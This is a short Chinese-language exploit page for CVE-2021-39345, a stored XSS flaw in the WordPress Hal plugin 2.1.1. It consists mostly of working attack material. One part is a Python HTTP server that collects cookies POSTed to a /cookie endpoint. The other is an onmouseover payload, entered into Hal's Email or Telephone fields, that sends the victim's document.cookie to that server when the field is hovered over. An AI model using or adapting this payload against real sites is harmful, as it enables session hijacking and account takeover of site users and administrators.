CVE-2021-39345

DeeLMind小于 1 分钟

CVE-2021-39345

CVE-2021-39345-Wordpress-Hal插件漏洞,版本Wordpress插件Hal.2.1.1

  • XSS反弹
from http.server import BaseHTTPRequestHandler


class PostHandler(BaseHTTPRequestHandler):
    def end_headers(self):
        self.send_header('Access-Control-Allow-Origin', '*')
        BaseHTTPRequestHandler.end_headers(self)


    def do_POST(self):       
        if self.path == "/cookie":
            req_datas = self.rfile.read(int(self.headers['content-length']))
            print(req_datas.decode())


        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()


if __name__ == '__main__':
    from http.server import HTTPServer
    server = HTTPServer(('192.168.199.1', 8001), PostHandler)
    print('Starting server, use <Ctrl-C> to stop')
    server.serve_forever()
  • 在Hal的Email,Telephone等输入框中插入Payload
"OnMoUsEoVeR=fetch("http://192.168.199.1:8001/cookie",{method:'POST',body:document.cookie,mode:'cors'})//
  • 把鼠标重新放到Email,Telephone等输入框中即触发Payload

er

上次编辑于:
贡献者: DeeLMind,DeeLMind